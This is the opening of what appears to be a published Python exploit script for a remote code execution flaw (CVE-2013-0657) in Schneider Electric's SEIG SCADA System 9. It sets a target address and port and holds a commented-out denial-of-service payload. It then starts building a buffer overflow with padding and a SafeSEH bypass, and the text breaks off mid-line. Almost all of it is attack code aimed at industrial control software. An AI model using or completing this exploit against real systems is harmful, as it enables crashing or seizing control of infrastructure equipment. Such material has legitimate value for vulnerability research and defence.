# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution # Author: Alejandro Parodi # Date: 2018-08-17 # Vendor Homepage: https://www.schneider-electric.com # Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/ # Version: v9 # Tested on: Windows7 x86 # CVE: CVE-2013-0657 # References: # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657 import socket import struct ip = "192.168.0.23" port = 12397 con = (ip, port) # DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER) # length = "\x00\x70\x00\x00\x00\x00\x00\x00" # message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644 # payload = length+message # Exploit Magic message_header = struct.pack("H", 0x6000) padding = "B" * 3344 eip_safeseh_bypass_address = struct.pack("